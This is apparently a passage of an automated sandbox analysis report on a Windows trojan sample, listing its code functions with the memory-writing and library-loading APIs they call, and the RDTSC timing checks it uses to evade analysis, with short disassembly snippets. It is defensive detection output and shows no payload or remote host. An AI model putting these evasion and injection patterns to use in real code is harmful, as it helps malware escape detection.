Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,	18_2_020B0CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,	18_2_020B1D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A27 NtWriteVirtualMemory,	18_2_020B4A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4638 NtWriteVirtualMemory,	18_2_020B4638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3E30 NtWriteVirtualMemory,	18_2_020B3E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4E36 NtWriteVirtualMemory,	18_2_020B4E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0E4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3244	18_2_020B3244
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B7E78 NtWriteVirtualMemory,	18_2_020B7E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A73 NtWriteVirtualMemory,	18_2_020B4A73
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3275	18_2_020B3275
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0E80
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4A87 NtWriteVirtualMemory,	18_2_020B4A87
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4E99 NtWriteVirtualMemory,	18_2_020B4E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4694 NtWriteVirtualMemory,	18_2_020B4694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4AA0 NtWriteVirtualMemory,	18_2_020B4AA0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0EB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B46D3 NtWriteVirtualMemory,	18_2_020B46D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1ED7 NtWriteVirtualMemory,	18_2_020B1ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2B01 NtWriteVirtualMemory,	18_2_020B2B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B00 NtWriteVirtualMemory,	18_2_020B4B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0F2F D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0F2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B2D NtWriteVirtualMemory,	18_2_020B4B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B25 NtWriteVirtualMemory,	18_2_020B4B25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,	18_2_020B2F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4B5C NtWriteVirtualMemory,	18_2_020B4B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2F50	18_2_020B2F50
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0F9B D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0F9B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4797 NtWriteVirtualMemory,	18_2_020B4797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2FA8	18_2_020B2FA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8BBE NtWriteVirtualMemory,	18_2_020B8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4BB0 NtWriteVirtualMemory,	18_2_020B4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0FEB D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0FEB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B47F4 NtWriteVirtualMemory,	18_2_020B47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4C16 NtWriteVirtualMemory,	18_2_020B4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0C25 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0C25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B104C D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B104C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4847 NtWriteVirtualMemory,	18_2_020B4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8C44	18_2_020B8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0C5B D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0C5B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4C68 NtWriteVirtualMemory,	18_2_020B4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8C6D	18_2_020B8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3063	18_2_020B3063
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4899 NtWriteVirtualMemory,	18_2_020B4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1094 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B1094
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0CA6 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0CA6
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B10CB D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B10CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B44CF NtWriteVirtualMemory,	18_2_020B44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0CC1 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0CC1
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B30C4	18_2_020B30C4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8CDA	18_2_020B8CDA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B48E3 NtWriteVirtualMemory,	18_2_020B48E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4CE4 NtWriteVirtualMemory,	18_2_020B4CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B60FA NtWriteVirtualMemory,	18_2_020B60FA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,	18_2_020B28FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0CF3 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0CF3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3114	18_2_020B3114
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8D14	18_2_020B8D14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4D2A NtWriteVirtualMemory,	18_2_020B4D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1120 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B1120
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4520 NtWriteVirtualMemory,	18_2_020B4520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4948 NtWriteVirtualMemory,	18_2_020B4948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8D5C	18_2_020B8D5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B116C D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B116C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B317B	18_2_020B317B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8D7E	18_2_020B8D7E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4570 NtWriteVirtualMemory,	18_2_020B4570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4D83 NtWriteVirtualMemory,	18_2_020B4D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4985 NtWriteVirtualMemory,	18_2_020B4985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0D91 D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0D91
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B45B5 NtWriteVirtualMemory,	18_2_020B45B5
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8DC3	18_2_020B8DC3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4DE9 NtWriteVirtualMemory,	18_2_020B4DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0DEF D3DKMTSetStablePowerState,TerminateProcess,	18_2_020B0DEF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B45E0 NtWriteVirtualMemory,	18_2_020B45E0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B45E4 NtWriteVirtualMemory,	18_2_020B45E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B45F9 NtWriteVirtualMemory,	18_2_020B45F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8DFF	18_2_020B8DFF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B31F4	18_2_020B31F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B49F4 NtWriteVirtualMemory,	18_2_020B49F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,	22_2_00560CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560C5B D3DKMTSetStablePowerState,	22_2_00560C5B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564847	22_2_00564847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568C44	22_2_00568C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056104C D3DKMTSetStablePowerState,	22_2_0056104C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056147F D3DKMTSetStablePowerState,	22_2_0056147F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568C6D	22_2_00568C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564C68	22_2_00564C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564C16	22_2_00564C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561407 D3DKMTSetStablePowerState,	22_2_00561407
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561437 D3DKMTSetStablePowerState,	22_2_00561437
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560C25 D3DKMTSetStablePowerState,	22_2_00560C25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568CDA	22_2_00568CDA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560CC1 D3DKMTSetStablePowerState,	22_2_00560CC1
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005644CF	22_2_005644CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005610CB D3DKMTSetStablePowerState,	22_2_005610CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560CF3 D3DKMTSetStablePowerState,	22_2_00560CF3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005628FE LoadLibraryA,	22_2_005628FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564CE4	22_2_00564CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005648E3	22_2_005648E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005614E8 D3DKMTSetStablePowerState,	22_2_005614E8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561094 D3DKMTSetStablePowerState,	22_2_00561094
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564899	22_2_00564899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560CA6 D3DKMTSetStablePowerState,	22_2_00560CA6
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568D5C	22_2_00568D5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564948	22_2_00564948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564570	22_2_00564570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568D7E	22_2_00568D7E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056116C D3DKMTSetStablePowerState,	22_2_0056116C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568D14	22_2_00568D14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561120 D3DKMTSetStablePowerState,	22_2_00561120
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564520	22_2_00564520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561D2E LoadLibraryA,	22_2_00561D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056152D	22_2_0056152D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564D2A	22_2_00564D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005645D2	22_2_005645D2
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568DC3	22_2_00568DC3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005649F4	22_2_005649F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568DFF	22_2_00568DFF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005645F9	22_2_005645F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005645E4	22_2_005645E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560DEF D3DKMTSetStablePowerState,	22_2_00560DEF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564DE9	22_2_00564DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560D91 D3DKMTSetStablePowerState,	22_2_00560D91
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564985	22_2_00564985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564D83	22_2_00564D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560E4D D3DKMTSetStablePowerState,	22_2_00560E4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00567E78	22_2_00567E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561265 D3DKMTSetStablePowerState,	22_2_00561265
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561204 D3DKMTSetStablePowerState,	22_2_00561204
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564E36	22_2_00564E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00563E30	22_2_00563E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564638	22_2_00564638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564A27	22_2_00564A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561ED7	22_2_00561ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005646D3	22_2_005646D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005612DC D3DKMTSetStablePowerState,	22_2_005612DC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564A97	22_2_00564A97
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564694	22_2_00564694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564E99	22_2_00564E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560E80 D3DKMTSetStablePowerState,	22_2_00560E80
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560EB3 D3DKMTSetStablePowerState,	22_2_00560EB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564AAB	22_2_00564AAB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564B5C	22_2_00564B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_0056136B D3DKMTSetStablePowerState,	22_2_0056136B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564F14	22_2_00564F14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00561313 D3DKMTSetStablePowerState,	22_2_00561313
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564B00	22_2_00564B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00562B01	22_2_00562B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00562F3E GetEnvironmentStringsW,LoadLibraryA,	22_2_00562F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560F2F D3DKMTSetStablePowerState,	22_2_00560F2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564B2D	22_2_00564B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005613C4 D3DKMTSetStablePowerState,	22_2_005613C4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_005647F4	22_2_005647F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560FEB D3DKMTSetStablePowerState,	22_2_00560FEB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564797	22_2_00564797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00560F9B D3DKMTSetStablePowerState,	22_2_00560F9B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00564BB0	22_2_00564BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00568BBE	22_2_00568BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,	24_2_00560CBA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560C5B D3DKMTSetStablePowerState,	24_2_00560C5B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564847	24_2_00564847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568C44	24_2_00568C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056104C D3DKMTSetStablePowerState,	24_2_0056104C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056147F D3DKMTSetStablePowerState,	24_2_0056147F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568C6D	24_2_00568C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564C68	24_2_00564C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564C16	24_2_00564C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561407 D3DKMTSetStablePowerState,	24_2_00561407
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561437 D3DKMTSetStablePowerState,	24_2_00561437
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560C25 D3DKMTSetStablePowerState,	24_2_00560C25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568CDA	24_2_00568CDA
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560CC1 D3DKMTSetStablePowerState,	24_2_00560CC1
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005644CF	24_2_005644CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005610CB D3DKMTSetStablePowerState,	24_2_005610CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560CF3 D3DKMTSetStablePowerState,	24_2_00560CF3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005628FE LoadLibraryA,	24_2_005628FE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564CE4	24_2_00564CE4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005648E3	24_2_005648E3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005614E8 D3DKMTSetStablePowerState,	24_2_005614E8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561094 D3DKMTSetStablePowerState,	24_2_00561094
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564899	24_2_00564899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560CA6 D3DKMTSetStablePowerState,	24_2_00560CA6
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568D5C	24_2_00568D5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564948	24_2_00564948
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564570	24_2_00564570
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568D7E	24_2_00568D7E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056116C D3DKMTSetStablePowerState,	24_2_0056116C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568D14	24_2_00568D14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561120 D3DKMTSetStablePowerState,	24_2_00561120
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564520	24_2_00564520
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561D2E LoadLibraryA,	24_2_00561D2E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056152D	24_2_0056152D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564D2A	24_2_00564D2A
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005645D2	24_2_005645D2
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568DC3	24_2_00568DC3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005649F4	24_2_005649F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568DFF	24_2_00568DFF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005645F9	24_2_005645F9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005645E4	24_2_005645E4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560DEF D3DKMTSetStablePowerState,	24_2_00560DEF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564DE9	24_2_00564DE9
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560D91 D3DKMTSetStablePowerState,	24_2_00560D91
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564985	24_2_00564985
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564D83	24_2_00564D83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560E4D D3DKMTSetStablePowerState,	24_2_00560E4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00567E78	24_2_00567E78
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561265 D3DKMTSetStablePowerState,	24_2_00561265
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561204 D3DKMTSetStablePowerState,	24_2_00561204
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564E36	24_2_00564E36
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00563E30	24_2_00563E30
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564638	24_2_00564638
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564A27	24_2_00564A27
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561ED7	24_2_00561ED7
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005646D3	24_2_005646D3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005612DC D3DKMTSetStablePowerState,	24_2_005612DC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564A97	24_2_00564A97
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564694	24_2_00564694
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564E99	24_2_00564E99
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560E80 D3DKMTSetStablePowerState,	24_2_00560E80
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560EB3 D3DKMTSetStablePowerState,	24_2_00560EB3
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564AAB	24_2_00564AAB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564B5C	24_2_00564B5C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_0056136B D3DKMTSetStablePowerState,	24_2_0056136B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564F14	24_2_00564F14
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00561313 D3DKMTSetStablePowerState,	24_2_00561313
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564B00	24_2_00564B00
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00562B01	24_2_00562B01
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00562F3E GetEnvironmentStringsW,LoadLibraryA,	24_2_00562F3E
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560F2F D3DKMTSetStablePowerState,	24_2_00560F2F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564B2D	24_2_00564B2D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005613C4 D3DKMTSetStablePowerState,	24_2_005613C4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_005647F4	24_2_005647F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560FEB D3DKMTSetStablePowerState,	24_2_00560FEB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564797	24_2_00564797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00560F9B D3DKMTSetStablePowerState,	24_2_00560F9B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00564BB0	24_2_00564BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00568BBE	24_2_00568BBE

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C37BB12h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
